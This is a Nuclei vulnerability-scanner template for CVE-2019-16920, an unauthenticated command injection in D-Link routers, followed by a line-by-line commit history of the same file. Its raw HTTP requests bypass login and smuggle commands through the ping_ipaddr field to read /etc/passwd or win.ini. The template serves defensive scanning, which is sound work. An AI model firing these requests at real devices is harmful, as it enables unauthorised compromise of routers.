nuclei-templates/cves/2019/CVE-2019-16920.yaml

id: CVE-2019-16920

info:
  name: D-Link Routers - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
  reference:
    - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16920
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16920
    cwe-id: CWE-78
  tags: cve,cve2019,dlink,rce,router,unauth

requests:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/login_pic.asp
        Cookie: uid=1234123

        html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/login_pic.asp
        Cookie: uid=1234123

        html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/16
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-16920`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00
			`info:`
Enhancement: cves/2019/CVE-2019-16920.yaml by mp 2022-05-16 13:36:42 +00:00			`name: D-Link Routers - Remote Code Execution`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`author: dwisiswant0`
			`severity: critical`
Enhancement: cves/2019/CVE-2019-16920.yaml by mp 2022-05-16 13:36:42 +00:00			description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r`
Enhancement: cves/2019/CVE-2019-16920.yaml by mp 2022-05-16 13:36:42 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2019-16920`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2019-16920`
			`cwe-id: CWE-78`
Update CVE-2019-16920.yaml 2022-05-17 06:23:26 +00:00			`tags: cve,cve2019,dlink,rce,router,unauth`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /apply_sec.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00			`Referer: {{BaseURL}}`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00
			`html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384`
			`- \|`
			`POST /apply_sec.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00			`Referer: {{BaseURL}}/login_pic.asp`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`Cookie: uid=1234123`

			`html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}`
			`- \|`
			`POST /apply_sec.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00			`Referer: {{BaseURL}}/login_pic.asp`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`Cookie: uid=1234123`

			`html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: regex`
Update CVE-2019-16920.yaml 2022-05-17 06:23:26 +00:00			`part: body`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`- "\\[(font\|extension\|file)s\\]"`
			`condition: or`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`- type: status`
			`status:`
Enhancement: cves/2019/CVE-2019-16920.yaml by mp 2022-05-16 13:36:42 +00:00			`- 200`

			`# Enhanced by mp on 2022/05/16`